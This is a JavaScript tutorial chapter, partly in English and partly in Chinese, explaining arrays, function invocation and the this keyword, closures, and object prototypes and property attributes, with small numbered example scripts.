var count=[1,,3]; //the array has three elements; the middle one is undefined
var undefs=[,,]; //the array has two elements, both undefined
Array-literal syntax allows an optional trailing comma, so [,,] has only two elements, not three.
• Calling the Array() constructor, in two forms:
• With no arguments: var a=new Array();
This creates an empty array with no elements, equivalent to the array literal [].
• With a single numeric argument specifying a length: var a=new Array(10);
When you know in advance how many elements you need, this form of the Array() constructor preallocates space for the array. No values are stored in the array yet, and the index properties "0", "1", and so on are not even defined.
You can also pass new Array() two or more array elements explicitly, or a single non-numeric element:
var a=new Array(5,4,"testing");
Reading and writing
Reading and writing array elements: use the [] operator to access an element of the array.
var a=["hello"]; //start with a one-element array
var value=a[0]; //read element 0
a[1]=3.14; //write element 1
i=2;
a[i]=3; //write element 2
document.write(a.length);
A special feature of JavaScript arrays is that when you use a non-negative integer less than 2^32 as an index, the array automatically maintains its length property. Above, we created an array with one element and then assigned to indexes 1 and 2, and the array length became 3.
Note: JavaScript array indexes are simply a special kind of object property name, which means arrays have no notion of an "out of bounds" error. Querying a property that does not exist in an object does not raise an error; it simply yields undefined.
Sparse arrays
A sparse array is one whose indexes are not contiguous starting from 0. In a sparse array, the length property is greater than the number of elements. You can create one with the Array() constructor, or simply by assigning to an index larger than the current array length.
a=new Array(5); //the array has no elements, but a.length is 5
a[1000]=0; //the assignment adds one element but sets length to 1001
Sufficiently sparse arrays are usually implemented more slowly than dense ones, make more efficient use of memory, and take longer to look elements up in.
Adding elements
There are three ways to add array elements:
• Assign to a new index:
var a=[]; //start with an empty array
a[0]="zero"; //then add elements to it
a[1]="one";
• Use push() to add one or more elements at the end of the array:
var a=[]; //start with an empty array
a.push("zero"); //add one element at the end
a.push("one","two"); //add two elements at the end
• Use unshift() to add one or more elements at the beginning of the array:
var a=[]; //start with an empty array
a.unshift("two"); //add one element at the beginning
a.unshift("zero","one"); //add two elements at the beginning
Deleting elements
There are three ways to delete array elements:
• With the delete operator:
Using delete on an array element does not modify the length property, nor does it shift elements down from higher indexes to fill the gap left by the deleted property.
var a=[1,2,3];
delete a[1]; //a no longer has an element at index 1
• Use pop() to delete the element at the end of the array:
This method decreases the array length.
var a=[1,2,3];
a.pop(); //remove the last element of a
• Use shift() to delete the element at the beginning of the array:
This method decreases the array length and shifts all subsequent elements down one place to fill the gap at the head of the array.
var a=[1,2,3];
a.shift(); //remove the first element of a
Multidimensional arrays
JavaScript does not support true multidimensional arrays, but they can be approximated with arrays of arrays.
chap3-9.html
<head><style>
    span{display: inline-block;width: 80px;height: 60px;font-size: xx-large}</style>
</head>
<body>
<script>
    var table=new Array(10); //the table has 10 rows
    for(var i=0;i<table.length;i++)
        table[i]=new Array(10); //each row has 10 columns
    //initialize the array
    for(var row=0;row<table.length;row++){
        for(var col=0;col<table[row].length;col++){
            table[row][col]=row*col;
        }
    }
    //print the element values
    for(var row=0;row<table.length;row++){
        for(var col=0;col<table[row].length;col++){
            document.write("<span>"+table[row][col]+"</span>");
        }
        document.write("<br>");
    }
</script>
</body>
Array methods
join(): converts all elements of the array to strings and concatenates them, returning the resulting string. You may specify an optional string to separate the elements in the result; if no separator is specified, a comma is used by default.
var a=[1,2,3]; //create an array with three elements
var str=a.join(); //str is "1,2,3"
str=a.join(" "); //str is "1 2 3"
reverse(): reverses the order of the elements in the array and returns the reversed array.
var a=[1,2,3]; //create an array with three elements
a.reverse();
for(var i=0;i<a.length;document.write(a[i]+"<br>"),i++);
sort(): sorts the elements of the array and returns the sorted array. Its syntax is: arrayObject.sort([sortby])
• When called with no arguments, it sorts the elements alphabetically — more precisely, in order of their character encodings.
var a=["banana","cherry","apple"];
a.sort();
for(var i=0;i<a.length;document.write(a[i]+"<br>"),i++);
var b=[33,4,1111,222];
b.sort(); //output: 1111 222 33 4
for(var i=0;i<b.length;document.write(b[i]+"<br>"),i++);
• To sort by any other criterion, supply a comparison function (sortby). The function compares two values and returns a number indicating their relative order. It should take two parameters, a and b, and return:
• a value less than 0 if a is less than b, i.e. a should appear before b in the sorted array.
• 0 if a equals b.
• a value greater than 0 if a is greater than b.
chap3-10.html
<script>
    var a=["banana","cherry","apple"];
    a.sort();
    for(var i=0;i<a.length;document.write(a[i]+"<br>"),i++);
    var b=[33,4,1111,222];
    b.sort(); //output: 1111 222 33 4
    for(var i=0;i<b.length;document.write(b[i]+"<br>"),i++);
    b.sort(function (m,n) {
        return m-n; //sort in ascending order
    });
    for(var i=0;i<b.length;document.write(b[i]+"<br>"),i++);
</script>
concat(): creates and returns a new array whose elements are those of the original array on which concat() was called, followed by each of concat()'s arguments. If any argument is itself an array, its elements — not the array itself — are concatenated.
Note: concat() does not recursively flatten arrays of arrays, and it does not modify the array it is called on.
chap3-11.html
<head>
    <meta charset="UTF-8">
    <title>chap3-11</title>
    <style>
        span{display: inline-block;width: 80px;height: 60px;font-size: xx-large}
        span#s1{display: block}
    </style>
</head>
<body>
<script>
    var a=[1,2,3];
    var b=a.concat(4,5); //returns [1,2,3,4,5]
    b=a.concat([4,5],[6,7]); //returns [1,2,3,4,5,6,7]
    b=a.concat([4,[5,[6,7]]]); //returns [1,2,3,4,[5,[6,7]]]
    for(var i=0;i<b.length;i++){
        if(Array.isArray(b[i]))
            for(var j=0;j<b[i].length;document.write("<span>"+b[i][j]+"</span>"),j++);
        else
            document.write("<span id='s1'>"+b[i]+"</span>");
    }
</script>
</body>
The slice() method returns a new array containing the elements of arrayObject from start up to, but not including, end. Its syntax is:
arrayObject.slice(start,end)
• start: required. Specifies where the selection begins. If negative, it specifies a position counted from the end of the array; that is, -1 refers to the last element, -2 to the second-to-last, and so on.
• end: optional. Specifies where the selection ends; it is the array index just past the end of the slice. If omitted, the slice includes everything from start to the end of the array. If negative, it specifies an element counted from the end of the array.
var a=[1,2,3,4,5];
document.write(a.slice(0,3)+"<br>"); //returns [1,2,3]
document.write(a.slice(3)+"<br>"); //returns [4,5]
document.write(a.slice(1,-1)+"<br>"); //returns [2,3,4]
The splice() method adds elements to and/or removes elements from an array, returning the removed elements. Its syntax is:
arrayObject.splice(index,howmany,item1,.....,itemX)
• index: required. An integer specifying where to add/remove elements; a negative value counts from the end of the array.
• howmany: required. The number of elements to remove. If set to 0, no elements are removed.
• item1,…,itemX: optional. New elements to add to the array.
• splice() removes zero or more elements starting at index and replaces them with the zero or more values listed in the argument list.
• If elements are removed from arrayObject, an array containing the removed elements is returned.
chap3-12.html
<script>
    var a=[1,2,3,4,5];
    document.write(a.slice(0,3)+"<br>"); //returns [1,2,3]
    document.write(a.slice(3)+"<br>"); //returns [4,5]
    document.write(a.slice(1,-1)+"<br>"); //returns [2,3,4]
    a.splice(2,0,6);
    document.write(a+"<br>"); //returns [1,2,6,3,4,5]
    a.splice(2,1);
    document.write(a+"<br>"); //returns [1,2,3,4,5]
    a.splice(2,1,6);
    document.write(a+"<br>"); //returns [1,2,6,4,5]
    a.splice(2,3,3);
    document.write(a+"<br>"); //returns [1,2,3]
    a.splice(3,0,4,5);
    document.write(a+"<br>"); //returns [1,2,3,4,5]
</script>
Functions
A function is a block of JavaScript code that is defined once but may be executed, or called, any number of times.
JavaScript functions are parameterized: a function definition includes a list of identifiers known as formal parameters, which behave like local variables within the function body. A function call supplies arguments for the function's formal parameters. The function uses its argument values to compute a return value, which becomes the value of the function-call expression.
In addition to its arguments, each call has another value: the context of the invocation, which is the value of the this keyword. If a function is attached to an object as one of its properties, it is called a method of the object. When the function is invoked through that object, the object is the context of the invocation — the value of this inside the function.
JavaScript functions may be nested inside other functions, forming a closure.
Definition
Functions are defined with the function keyword, which may appear in:
• A function declaration statement
In a function declaration statement:
• The function name after the function keyword is a required part of the declaration.
• A pair of parentheses contains a comma-separated list of zero or more formal parameters.
• A pair of curly braces contains zero or more JavaScript statements.
These statements make up the function body, which executes whenever the function is invoked.
function jc(x) {
    var result=1;
    for(var i=1;i<=x;i++){
        result*=i;
    }
    return result;
}
var a=Number(prompt("Please enter a positive integer:",""));
document.write(jc(a)+"<br>");
• A function definition expression
In a function definition expression the function name is optional; if present, the name exists only within the function body, where it refers to the function object itself.
var square=function(x) {return x*x;}; //the function name is omitted in the definition
document.write(square(a)+"<br>"); //invoked through the variable name (the argument)
var f=function fact(x) { //the definition may include a function name
    if (x<=1)
        return 1;
    else
        return x*fact(x-1);
}
document.write(f(a)+"<br>"); //invoked through the variable name (the argument)
Like variables, function declaration statements are "hoisted" to the top of the enclosing script or function scope, so a function declared this way may be invoked by code that appears before its definition.
Function definition expressions are another matter: to invoke a function you must be able to refer to it, and a function defined as an expression cannot be used until it has been assigned to a variable. Variable declarations are hoisted, but assignments to those variables are not, so a function defined with an expression cannot be invoked before its definition.
chap3-13.html
<script>
    var a=Number(prompt("Please enter a positive integer:",""));
    document.write(jc(a)+"<br>");
    function jc(x) {
        var result=1;
        for(var i=1;i<=x;i++){
            result*=i;
        }
        return result;
    }
    var square=function(x) {return x*x;}; //the function name is omitted in the definition
    document.write(square(a)+"<br>"); //invoked through the variable name (the argument)
    var f=function fact(x) { //the definition may include a function name
        if (x<=1)
            return 1;
        else
            return x*fact(x-1);
    }
    document.write(f(a)+"<br>"); //invoked through the variable name (the argument)
</script>
调用
有4种方式来调用JavaScript函数:
• 作为函数调用:var a=jc(10);
• 作为方法调用:var b=Math.floor(3.2);
方法调用和函数调用有一个重要的区别,即:调用上下文。this关键字只能出现在函数中,当然在全局作用域中是个例外。
全局作用域中this指向全局对象(全局对象在浏览器这个环境中指window)。
如果this出现在函数中,其指向的依据就是函数的执行环境而不是声明环境。换句话说,this永远指向所在函数的所有者,当没有显式的所有者的时候,那么this指向全局对象。
各种情况下的this的具体指向:
• 在全局作用域中this指向全局对象window。例如:document.write(this+ "<br>");
• 函数作为某个对象的成员方法调用时this指向该对象。
chap3-14.js
var name="zhangsan";
var obj={
name:"lizi",
getName:function () {
document.write(this.name + "<br>");
}
}
obj.getName(); //输出lizi
• 函数作为函数直接使用时this指向全局对象。
chap3-14.js
var name="zhangsan";
var obj={
name:"lizi",
getName:function () {
document.write(this.name + "<br>");
}
}
var nameGet=obj.getName;
nameGet(); //输出zhangsan
• 函数作为构造函数调用时this指向用该构造函数构造出来的新对象。
chap3-14.js
var name="zhangsan";
var obj1=function (x,y) {
this.name=x+y;
}
obj1.prototype.getName=function () {
document.write(this.name + "<br>");
}
var myObj=new obj1("wang","er");
myObj.getName(); //输出wanger
• call()、apply()、bind()方法可以改变函数执行时的this指向。
function Sister() {
this.age=18;
this.sayAge=function () {document.write("Age:"+this.age+ "<br>");}
}
function Brother() {
this.age=25;
this.sayAge=function () {document.write("Age:"+this.age+ "<br>");}
}
var sis=new Sister();
var bro=new Brother();
sis.sayAge.call(bro); //输出"Age:25"
• 作为构造函数调用
如果函数或者方法调用之前带有关键字new,它就构成构造函数调用。例如:var myObj=new obj1("wang","er");
构造函数调用创建和初始化一个新的对象myObj,并将这个对象用做其调用上下文,因此构造函数可以使用this关键字来引用这个新创建的对象。myObj对象继承自构造函数的prototype属性。
• 间接调用
call()和apply()方法可以看做是某个对象的方法,通过调用方法的形式来间接调用函数。
他们的用途相同,都是在特定的作用域中调用函数。
接收参数方面不同,apply()接收两个参数,一个是函数运行的作用域(this),另一个是参数数组。call()方法第一个参数与apply()方法相同,但传递给函数的参数必须列举出来。
chap3-14.js
window.firstName="San";
window.lastName="Zhang";
var myObject={firstName:"my",lastName:"Object"};
function HelloName() {document.write(this.firstName+" "+this.lastName+ "<br>");}
HelloName.call(window); //输出"San Zhang"
HelloName.call(this); //输出"San Zhang"
HelloName.call(myObject); //输出"my Object"
function sum(m,n) {
return m+n;
}
document.write(sum.call(window,10,10)+ "<br>"); //输出20
document.write(sum.apply(window,[10,20])+ "<br>"); //输出30
实参和形参
JavaScript中的函数定义并未指定函数形参的类型,函数调用也未对传入的实参值做任何类型检查。实际上,JavaScript函数调用甚至不检查传入形参的个数。
可选形参:当调用函数的时候传入的实参比形参个数少时,剩下的形参都将设置为undefined值。因此在调用函数时形参是否可选以及是否可以省略应当保持较好的适应性。为了做到这一点,应当给省略的参数赋一个合理的默认值。
• 注意:当用这种可选形参来实现函数时,需要将可选形参放在形参列表的最后。
chap3-15.js
function int(x,type) {
if(type===undefined) return Math.floor(x);
if(type===1) return Math.floor(x);
if(type===2) return Math.ceil(x);
if(type===3) return Math.round(x);
}
document.write("3.4默认去尾法取整:" +int(3.4)+"<br>");
document.write("3.4去尾法取整:" +int(3.4,1)+"<br>");
document.write("3.4进位法取整:" +int(3.4,2)+"<br>");
document.write("3.4四舍五入取整:" +int(3.4,3)+"<br>");
可变长的实参列表(实参对象):当调用函数的时候传入的实参个数超过函数定义时的形参个数时,没有办法直接获得未命名值的引用。参数对象解决了这个问题。
• 实参对象有一个重要的用处就是:让函数可以操作任意数量的实参。
• 假设定义了函数f,它的形参只有一个x。如果调用f时传入两个实参,第一个实参可以通过形参名x来获得,也可以通过arguments[0]来得到;第二个实参只能通过arguments[1]来得到。此外,和数组一样,arguments.length属性返回实参的个数。
• 注意:arguments不是数组,它是一个实参对象。每个实参对象都包含以数字为索引的一组元素以及length属性。
chap3-15.js
function max() {
var max=Number.NEGATIVE_INFINITY; //NEGATIVE_INFINITY 表示负无穷大
for(var i=0;i<arguments.length;i++){
if(arguments[i]>max) max=arguments[i];
}
return max;
}
var largest=max(1,10,100,2,3,1000,4,5,10000,6);
document.write("最大值为:"+largest+"<br>");
将对象属性用做实参:当一个函数包含超过三个形参时,对于程序员来说,要记住调用函数中实参的正确顺序很难。最好通过名/值对的形式来传入参数,这样参数的顺序就无关紧要了。为了实现这种风格的方法调用,定义函数时,传入的实参都写入一个单独的对象中,在调用的时候传入一个对象,对象中的名/值对是真正需要的实参数据。
chap3-15.js
function arraycopy(from,from_start,to,to_start,length) {
for(var i=to_start;i<to_start+length;i++){
to[i]=from[from_start+i-to_start];
}
}
function easycopy(args) {
arraycopy(args.from,
args.from_start||0, //这里设置了默认值
args.to,
args.to_start||0, //这里设置了默认值
args.length
);
}
var a=[1,2,3,4],b=[5,6,7,8];
easycopy({from:a, to:b, to_start:2, length:4});
for(var i=0;i<b.length;i++){document.write(b[i]+"<br>");}
作为值的函数
在JavaScript中,函数不仅是一种语法,也是值,也就是说,可以将函数赋值给变量。
chap3-16.js
function square(x) {return x*x;}
var s=square; //现在s和square指代同一个函数
document.write(square(4)+"<br>");
document.write(s(4)+"<br>");
除了可以将函数赋值给变量,同样可以将函数赋值给对象的属性。
chap3-16.js
var o={square:square};
var x=o.square(16);
document.write(x+"<br>");
函数甚至不需要带名字,当把它们赋值给数组元素时:
chap3-16.js
var a=[function (x) {return x*x},20];
document.write(a[0](a[1])+"<br>");
作为命名空间的函数
JavaScript中变量的作用域有全局变量和局部变量2种。在JavaScript中是无法声明只在一个代码块内可见的变量的,基于这个原因,我们常常简单地定义一个函数用做临时的命名空间,在这个命名空间内定义的变量都不会污染到全局命名空间。
function mymodule() {
//模块代码,这个模块所使用的所有变量都是局部变量,而不是污染全局命名空间
}
mymodule(); //不要忘了还要调用这个函数
这段代码仅仅定义了一个单独的全局变量:名叫“mymodule”的函数。这样还是太麻烦,可以直接定义一个匿名函数,并在单个表达式中调用它:
(function () {
//模块代码
}()); //结束函数定义并立即调用它
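下面补充一个可运行的小示例(原文没有此代码,仅作示意),演示立即调用的匿名函数如何避免把内部变量泄漏到全局命名空间:

```javascript
// 立即调用的匿名函数(IIFE):内部变量counter不会泄漏到全局
var result = (function () {
    var counter = 0;    // 只在函数内部可见
    counter += 1;
    return counter;     // 只向外暴露需要的值
}());
console.log(result);         // 1
console.log(typeof counter); // "undefined":全局作用域中不存在counter
```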
闭包
出于种种原因,我们有时候需要得到函数内的局部变量。闭包可以捕捉到局部变量(和参数),并一直保存下来。闭包就是一个函数引用另外一个函数的变量,因为变量被引用着所以不会被回收,因此可以用来封装一个私有变量。这是优点也是缺点,不必要的闭包只会徒增内存消耗!
chap3-17.js
var scope="global scope"; //全局变量
function checkscope() {
var scope="local scope"; //局部变量
function f() {return scope;} //在作用域中返回这个值
return f();
}
var a=checkscope();
document.write(a+"<br>")
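上例中f()是在定义它的作用域内被直接调用的;若把f本身返回,闭包会继续持有局部变量。下面补充一个常见的计数器示例(原文没有,仅作示意):

```javascript
function makeCounter() {
    var count = 0;            // 私有变量,外部无法直接访问
    return function () {      // 返回的函数构成闭包,引用着count
        count += 1;
        return count;
    };
}
var c1 = makeCounter();
var c2 = makeCounter();       // 每次调用makeCounter都产生独立的闭包
console.log(c1());  // 1
console.log(c1());  // 2
console.log(c2());  // 1:c2持有自己的count
```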
对象
对象是一种复合值,它将很多值聚合在一起,可通过名字访问这些值。对象也可看作是属性的无序集合,每个属性都是一个名/值对。属性名是字符串,因此我们可以把对象看成是从字符串到值的映射。
对象除了可以保持自有的属性外,还可以从一个称为“原型”的对象继承属性。
除了字符串、数字、true、false、null和undefined之外,JavaScript中的值都是对象。
除了包含属性之外,每个对象还拥有三个相关的对象特性:
对象的原型(prototype)指向另一个对象,本对象的属性继承自它的原型对象。
对象的类(class)是一个标识对象类型的字符串。
对象的扩展标记(extensible flag)指明了(在ECMAScript 5中)是否可以向该对象添加新属性。
JavaScript对象的类别
• 内置对象:是由ECMAScript规范定义的对象或类。例如,数组,函数,日期和正则表达式。
• 宿主对象:是由JavaScript解释器所嵌入的宿主环境(比如Web浏览器)定义的。客户端JavaScript中表示网页结构的HTMLElement对象均是宿主对象。
• 自定义对象:是由运行中的JavaScript代码创建的对象。
创建对象
创建对象(3种方式):
• 对象直接量:是由若干属性名/值对组成的映射表,名/值对之间用逗号分隔,整个映射表用花括号括起来。例如:
var empty={}; //空对象,没有任何属性
var point={x:0,y:0}; //两个属性
var book={
"main title":"JavaScript", //属性名字里有空格,必须用字符串表示
"sub-title":"The Definitive Guide", //属性名字里有连字符,必须用字符串表示
"for":"all audiences", //"for"是保留字,因此必须用引号
author:{ //这个属性的值是一个对象
firstname:"Shulin",
lastname:"Chen"
}
};
• 通过new创建对象:new关键字创建并初始化一个新对象,new后跟随一个函数调用。这里的函数称作构造函数。例如:
var author=new Object(); //创建一个空对象
author.firstname="Shulin";
author.lastname="Chen";
var mycars=new Array();
mycars[0]="Saab";
mycars[1]="Volvo";
var today = new Date(); //Date 对象自动使用当前的日期和时间作为其初始值。
• Object.create(proto[, propertiesObject]) 是ECMAScript 5中提出的一种新的对象创建方式,第一个参数是要继承的原型,也可以传一个null,第二个参数是对象的属性描述符,这个参数是可选的。例如:
var o1 = Object.create({x:1,y:2}); //o1继承了属性x和y
var o2 = Object.create(Object.prototype); //o2和{}以及new Object()一样,创建了一个普通的空对象
• 如果proto参数不是 null 或一个对象,则抛出一个 TypeError 异常。
• 在ECMAScript 3中可以用类似下面的代码来模拟原型继承:
chap3-18.js
//inherit()返回了一个继承自原型对象p的属性的新对象
//这里使用ECMAScript 5中的Object.create()函数(如果存在的话)
//如果不存在Object.create(),则退化使用其它方法
function inherit(p) {
if(p==null) throw TypeError(); //p是一个对象,但不能是null
if(Object.create) return Object.create(p); //如果Object.create()存在,直接使用它
var t=typeof p;
if(t!=="object" && t!=="function") throw TypeError();
function f() {}; //定义一个空构造函数
f.prototype=p; //将其原型属性设置为p
return new f(); //使用f()创建p的继承对象
}
//inherit()函数的其中一个用途就是防止函数无意间(非恶意地)修改那些不受你控制的对象。
// 不是将对象直接作为参数传入函数,而是将它的继承对象传入函数。
//如果给继承对象的属性赋值,则这些属性只会影响这个继承对象自身,而不是原始对象。
var o={x:"don't change this value"};
changex(inherit(o));
function changex(obj) {
obj.x="hello world!";
document.write(obj.x+"<br>");
}
document.write(o.x+"<br>");
changex(o);
document.write(o.x+"<br>");
属性的查询和设置
JavaScript为属性访问定义了两种语法:
对象名.属性名 或 对象名[表达式]
其中,表达式指定要访问的属性的名称或者代表要访问数组元素的索引。
对于点(.)来说,右侧必须是一个以属性名称命名的简单标识符(不能有空格、连字符等)。点运算符后的标识符不能是保留字,比如book.for是非法的,必须使用方括号的形式访问它们,比如book["for"]
对于方括号([])来说,方括号内必须是一个计算结果为字符串的表达式。其看起来更像数组,只是这个数组元素是通过字符串索引而不是数字索引。这种数组称为“关联数组”。
chap3-19.html
<script>
var book={
"main title":"JavaScript",
"sub-title":"The Definitive Guide",
"for":"all audiences",
author:{
firstname:"Shulin",
lastname:"Chen"
}
};
var a=[book,4,[5,6]];
document.write(book.author.firstname+"<br>"); //获得book对象中author的“firstname”属性
document.write(book["for"]+"<br>");
document.write(a[0]["main title"]+"<br>");
document.write(a[2][1]+"<br>");
book["main title"]="ECMAScript 6"; //给“main title”属性赋值
</script>
JavaScript对象具有自有属性(实例属性),也有一些属性是从原型对象继承而来的(继承属性)。
假设要查询对象q的属性x,如果q中不存在x,则会继续在q的原型对象中查询属性x,如果原型对象中也没有x,但这个原型对象也有原型,那么继续在这个原型对象的原型对象上执行查询,直到找到x或者查找到一个原型是null的对象为止。可以看到,对象的原型属性构成了一个“链”,通过这个“链”可以实现属性的继承。
chap3-20.html
<head>
<meta charset="UTF-8">
<title>chap3-20</title>
<script src="js/chap3.js"></script>
</head>
<body>
<script>
var o={}; //o从Object.prototype继承对象的方法
o.x=1; //给o定义一个属性x
var p=inherit(o); //p继承o和Object.prototype
p.y=2; //给p定义一个属性y
var q=inherit(p); //q继承p、o和Object.prototype
q.z=3; //给q定义一个属性z
document.write(q.x+q.y+q.z+"<br>");
</script>
</body>
假设给对象o的属性x赋值,如果o中已经有属性x(这个属性不是继承来的),那么这个赋值操作只改变这个已有属性x的值。如果o中不存在属性x,那么赋值操作给o添加一个新的属性x。如果之前o继承自属性x,那么这个继承的属性就被新创建的同名属性覆盖了。
属性赋值操作首先检查原型链,以此判定是否允许赋值操作。如果o继承自一个只读属性x,那么赋值操作是不允许的。如果允许属性赋值操作,它也总是在原始对象上创建属性或对已有的属性赋值,而不会去修改原型链。
chap3-20.js
var a={
get r(){return 1;},
x:1
};
var b=inherit(a); //b继承属性r
b.y=1; //b定义了一个属性y
b.x=2; //b覆盖继承来的属性x
b.r=3; //r为只读属性,赋值语句无效
document.write(b.r+"<br>"); //输出1
document.write(b.x+"<br>"); //输出2
document.write(a.x+"<br>"); //原型对象没有修改
删除属性
delete运算符可以删除对象的属性。它的操作数是一个属性访问表达式:
delete只是断开属性和宿主对象的联系,而不会去操作对象中的属性。
delete运算符只能删除自有属性,不能删除继承属性,要删除继承属性必须从定义这个属性的原型对象上删除它,而且这会影响到所有继承自这个原型的对象。
chap3-21.js
var book={
"main title":"JavaScript",
"sub-title":"The Definitive Guide",
"for":"all audiences",
author:{
firstname:"Shulin",
lastname:"Chen"
}
};
delete book.author; //book不再有属性author
delete book["main title"]; //book不再有属性"main title"
document.write(book.author+"<br>");
document.write(book["main title"]+"<br>");
var o=Object.create(book); //o继承了book对象的属性
delete o["for"]; //不能删除继承属性
document.write(book["for"]+"<br>");
检测属性
判断某个属性是否存在于某个对象中可以有3种方式:
in运算符:如果对象的自有属性或继承属性中包含这个属性,则返回true
hasOwnProperty()方法:对象的自有属性返回true,对于继承属性返回false
propertyIsEnumerable()方法:只有检测到是自有属性且这个属性的可枚举性为true时,它才返回true。某些内置属性是不可枚举的。
var o={x:1};
var obj=Object.create(o);
obj.y=2;
"x" in obj; //返回true
"y" in obj; //返回true
obj.hasOwnProperty("x"); //返回false
obj.hasOwnProperty("y"); //返回true
obj.propertyIsEnumerable("x"); //返回false
obj.propertyIsEnumerable("y"); //返回true
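下面补充一个可运行的小示例(原文没有,仅作示意),验证这三种检测方式对自有属性、继承属性和内置不可枚举属性的区别:

```javascript
var proto = { x: 1 };
var obj = Object.create(proto);  // obj继承proto
obj.y = 2;                       // y是obj的自有属性

console.log("x" in obj);                       // true:in对继承属性也返回true
console.log(obj.hasOwnProperty("x"));          // false:x不是自有属性
console.log(obj.propertyIsEnumerable("y"));    // true:自有且可枚举
// toString继承自Object.prototype,且不可枚举
console.log("toString" in obj);                     // true
console.log(obj.propertyIsEnumerable("toString"));  // false
```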
枚举属性
在JavaScript中,对象的属性分为可枚举和不可枚举之分,它们是由属性的enumerable值决定的。
JavaScript中基本包装类型的原型属性是不可枚举的,如Object, Array, Number等。
Object对象的propertyIsEnumerable()方法可以判断此对象是否包含某个属性,并且这个属性是否可枚举。
for/in循环可以遍历对象中所有可枚举的对象属性(包括对象自有属性和继承的属性)。
Object.keys()方法会返回一个由一个给定对象的自身可枚举属性组成的数组。
Object.getOwnPropertyNames()方法会返回一个由一个给定对象的自身属性组成的数组,包括可枚举和不可枚举的。
chap3-22.js
var po={px:1,py:2};
var o={x:3,y:4};
o.__proto__=po; //设置o的原型为po
document.write("for/in方法输出结果:<br>");
for(property in o){
document.write(property+":"+o[property]+"<br>");
}
var propertyArray=Object.keys(o);
document.write("定义枚举属性前Object.keys方法输出结果:<br>");
for(var i=0;i<propertyArray.length;i++){
document.write(propertyArray[i]+"<br>");
}
Object.defineProperties(o,{
x:{enumerable:true},
y:{enumerable:false}
});
propertyArray=Object.keys(o);
document.write("定义枚举属性后Object.keys方法输出结果:<br>");
for(var i=0;i<propertyArray.length;i++){
document.write(propertyArray[i]+"<br>");
}
propertyArray=Object.getOwnPropertyNames(o);
document.write("定义枚举属性后Object.getOwnPropertyNames方法输出结果:<br>");
for(var i=0;i<propertyArray.length;i++){
document.write(propertyArray[i]+"<br>");
}
属性getter和setter
对象属性是由名字、值和一组特性(attribute)构成的。在ECMAScript 5中,属性值可以用一个或两个方法替代,这两个方法就是getter和setter。由getter和setter定义的属性称作“存取器属性”(accessor property),它不同于“数据属性”(data property)。
数据属性:包含属性的操作特性;如:设置值、是否可枚举等。
特性名称 描述 默认值
value 设置属性的值 undefined
writable 是否可修改属性的值;true:可修改属性的值;false:不可修改属性的值 false
enumerable 是否可枚举属性;true:可枚举,可通过for/in语句枚举属性;false:不可枚举 false
configurable 是否可修改属性的特性;true:可修改属性的特性(如把writable由false改为true);false:不可修改属性的特性 false
存取器属性:属性值的读写通过getter和setter方法完成,它没有value和writable特性。
特性名称 描述 默认值
get 属性的返回值函数 undefined
set 属性的设置值函数;含有一个赋值参数 undefined
enumerable 是否可枚举属性;true:可枚举,可通过for/in语句枚举属性;false:不可枚举 false
configurable 是否可修改属性的特性;true:可修改属性的特性;false:不可修改属性的特性 false
存取器也是可以继承的。
chap3-23.html
<script>
var obj={};
//添加一个属性,并设置为存取器属性
Object.defineProperty(obj,"name",{
get:function () {
return this._name; //get和set里的变量不要使用属性,如:属性为name,get和set用的是_name
},
set:function (x) {
if(isNaN(x)) //isNaN() 函数用于检查其参数是否是非数字值。
this._name=x;
else
this._name="name不能为纯数字";
},
enumerable:true,
configurable:true
});
obj.name="12";
document.write(obj.name+"<br>");
var o=inherit(obj); //存取器也是可以继承的
o.name="a12";
document.write(o.name+"<br>");
</script>
属性的特性
为了实现属性特性的查询和设置操作,ECMAScript 5中定义了一个名为“属性描述符”(property descriptor)的对象,这个对象代表数据属性特性和存取器属性特性。
在使用Object.defineProperty、Object.defineProperties、Object.create函数的情况下添加数据属性,writable、enumerable和configurable默认值为false。
使用对象直接量创建的属性,writable、enumerable和configurable特性默认为true。
Object.getOwnPropertyDescriptor(object,propertyname)可用来获取描述属性特性的描述符对象。其中object为包含属性的对象,必需;propertyname为属性的名称,必需。
chap3-24.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-24</title>
</head>
<body style="font-size: xx-large">
<script>
var o1={name:"tom"};
document.write("对象直接量,属性特性默认为true<br>");
var desc=Object.getOwnPropertyDescriptor(o1,"name");
for(var prop in desc)
document.write(prop+":"+desc[prop]+"<br>");
var o2=Object.create(null,{
name:{value:"tom"}
});
document.write("通过Object.create创建,属性特性默认为false<br>")
desc=Object.getOwnPropertyDescriptor(o2,"name");
for(prop in desc)
document.write(prop+":"+desc[prop]+"<br>");
</script>
</body>
</html>
三个属性
原型属性
是用来继承属性的,指向另一个对象,本对象的属性继承自它的原型对象。
• 通过对象直接量创建的对象使用Object.prototype作为它们的原型;
• 通过new创建的对象使用构造函数的prototype属性来作为它们的原型;
• 通过Object.create()来创建的对象使用第一个参数作为它们的原型。
在ECMAScript 5中,将对象作为参数传入Object.getPrototypeOf()可查询它的原型;
想要检测一个对象是否是另一个对象的原型(或处于原型链中),使用isPrototypeOf()
var p={x:1,y:2};
var o=Object.create(p);
document.write(p.isPrototypeOf(o)+"<br>"); //返回true
document.write(Object.prototype.isPrototypeOf(o)); //返回true
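Object.getPrototypeOf()的用法可以用下面的补充示例演示(原文没有,仅作示意):

```javascript
var p = { x: 1 };
var o = Object.create(p);   // o以p为原型
console.log(Object.getPrototypeOf(o) === p);                 // true
console.log(Object.getPrototypeOf(p) === Object.prototype);  // true:对象直接量的原型
console.log(Object.getPrototypeOf(Object.prototype));        // null:原型链的终点
```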
类属性
是一个字符串,用以表示对象的类型信息。只能通过toString()这种间接的方法查询对象的类信息。该方法返回如下格式的字符串:[object class]
很多对象继承的toString()方法被重写过,因此必须借助Function.call()间接地调用Object.prototype.toString():
chap3-25.html
<script>
function classOf(o) {
if(o===null) return "null";
if(o===undefined) return "undefined";
return Object.prototype.toString.call(o).slice(8,-1);//提取返回字符串的第8个到倒数第二个位置之间的字符
}
document.write("null值类属性:"+classOf(null)+"<br>");
document.write("数组类属性:"+classOf(new Array())+"<br>");
document.write("对象类属性:"+classOf({})+"<br>");
document.write("字符串类属性:"+classOf("")+"<br>");
document.write("数值类属性:"+classOf(1)+"<br>");
document.write("布尔值类属性:"+classOf(true)+"<br>");
document.write("日期类属性:"+classOf(new Date())+"<br>");
document.write("正则表达式类属性:"+classOf(new RegExp())+"<br>");
document.write("客户端宿主对象类属性:"+classOf(window)+"<br>");
function f() {};
document.write("函数类属性:"+classOf(f)+"<br>");
document.write("函数对象类属性:"+classOf(new f())+"<br>");
